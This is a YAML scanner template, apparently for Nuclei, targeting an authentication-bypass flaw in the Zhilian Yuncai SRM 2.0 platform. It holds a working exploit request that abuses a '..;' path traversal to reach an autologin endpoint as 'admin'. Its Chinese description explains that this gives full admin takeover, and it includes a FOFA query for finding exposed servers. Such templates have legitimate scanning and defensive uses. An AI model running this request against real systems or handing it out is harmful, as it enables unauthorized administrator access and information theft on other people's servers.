http:
    - matchers:
        - part: header
          type: word
          words:
            - 'Location: /adpweb/a;'
        - status:
            - 302
          type: status
      matchers-condition: and
      raw:
        - |
          GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1
          Host: {{Hostname}}
id: zhilianyuncai-autologin-Authentication-bypass
info:
    author: Superhero
    description: |-
        fofa: title=="SRM 2.0"
        由于智联云采 SRM2.0 autologin 接口代码逻辑存在缺陷，导致未授权的攻击者可以构造特殊绕过身份认证，直接以管理员身份接管后台，造成信息泄露，使系统处于极不安全的状态。
    name: 智联云采 SRM2.0 autologin  身份认证绕过漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487161&idx=1&sn=a9c3f9a8939dbd3d4e62bad28bda72bc&chksm=c267bb8af510329c73ff6dd5e0539863c7a7f2542e2b882883a6a682f480a711476c1c6b31fa&token=101124693&lang=zh_CN#rd
    severity: high
    tags:
        - Authentication bypass
        - 智联云采 SRM2.0
